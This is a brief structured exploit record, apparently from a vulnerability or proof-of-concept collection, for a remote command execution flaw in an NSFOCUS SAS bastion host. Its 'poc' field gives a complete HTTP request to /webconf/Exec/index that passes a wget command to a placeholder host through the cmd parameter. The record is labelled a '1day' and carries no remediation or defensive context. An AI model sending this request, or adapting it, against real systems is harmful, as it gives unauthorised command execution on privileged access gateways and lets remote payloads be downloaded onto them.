vendor = "绿盟"
name = "绿盟sas堡垒机exec远程命令执行漏洞"
type = "RCE"
source = "TG"
info = "/webconf/Exec/index"
date = "08.11"
poc = "GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1 Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12. Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Connection: close"
label = "1day"
